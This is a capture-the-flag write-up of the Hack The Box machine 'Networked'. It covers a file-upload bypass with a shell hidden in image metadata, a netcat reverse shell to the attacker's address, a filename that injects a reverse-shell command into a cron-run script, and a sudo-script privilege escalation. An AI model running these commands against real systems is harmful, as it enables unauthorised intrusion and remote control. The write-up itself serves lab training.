HTB: Networked write-up
I was browsing Hack The Box today, and decided to tackle a new box, the box I saw was Networked, it’s made by Guly and looks like a fairly easy box, so let’s get exploiting!
The machine lives on 10.10.10.146, a quick nmap scan shows port 22 and 80 are open, so we know we’re dealing with an initial foothold from the web.
We can see on the initial page, there’s just some text, so let’s run dirbuster on it! After a quick scan, we see there’s a public /uploads/ directory, and /backup/ directory.
Awesome! We’ve got a backup of the source code, let’s download and inspect the code! The source ships with index.php, lib.php, photos.php and upload.php. Now, I think we’re most interested in the upload part and the photos part. Let’s check it out.
After an initial review, it looks like we’re just uploading a file, renaming it by the IP address of the user, and saving it to the /var/www/html/uploads/, some common checks we do are mime-type, and file extension. Now, there’s two ways we can crack at this, the first is uploading a common PHP shell and setting the file name like: notashell.php%00.jpg, however, let’s try harder and actually encode a comment with exiftool!
I start off by downloading a photo of the CentOS logo, and then run exiftool on it. Here’s how it looks:
We now have an embedded shell inside the photo, let’s upload this picture!
We’re told to refresh the gallery, upon refresh we see the picture! Let’s go to the direct link of it.
Our shell listens on ?c=$command, so let’s have it open a reverse shell to our local box. Add the argument: ?c=nc 10.10.14.128 9983 -e /bin/bash, and load the page. It will hang forever, as long as you keep the tty open.
We got our initial apache/www-data shell! A quick check of /home/ shows us a user, guly, and a crontab file along with a check_attack.php, this might be interesting.
The crontab.guly runs every 3rd minute, and the check_attack.php looks for files not named like ip.extension, so we can leverage this, it also doesn’t bother to escape the shell arguments, bingo!
So, we need to spawn a shell, we’ve got nc on the box, so let’s force a shell open. Go into /var/www/html/uploads/, and run: touch “; nc 10.10.$IP $PORT -c bash” to open a shell on the 3rd minute, then wait for the back connection.
Bingo, we have a shell, let’s spawn a proper pty session with python:
python -c 'import pty; pty.spawn("/bin/bash")'
Now we’ve got our full and proper shell! Let’s grab the user flag by cat /home/guly/user.txt!
Perfect, we’ve got the flag! Let’s head for root. After doing a few of these boxes, I’ve found that a good starter spot to check is sudo -l, so let’s run that:
Perfect, I got lucky this time. We have a /usr/local/sbin/changename.sh that accepts a limited scope of arbitrary input! We should be able to bypass this!
Now, we have two ways to attack this, the first is we can copy the /root/ directory into guly, and chown it so we can real it. The second is we can just spawn a bash shell, let’s start with the copy /root/ directory out.
Perfect, our escape worked! Let’s check the /home/guly/ directory!
We got our root flag! But, we could’ve done the same escape with the test\ bash as the input, let’s try it.
Hello, root! Yet another way we jumped in to get the root flag.
That’s all for this box, we can consider it owned.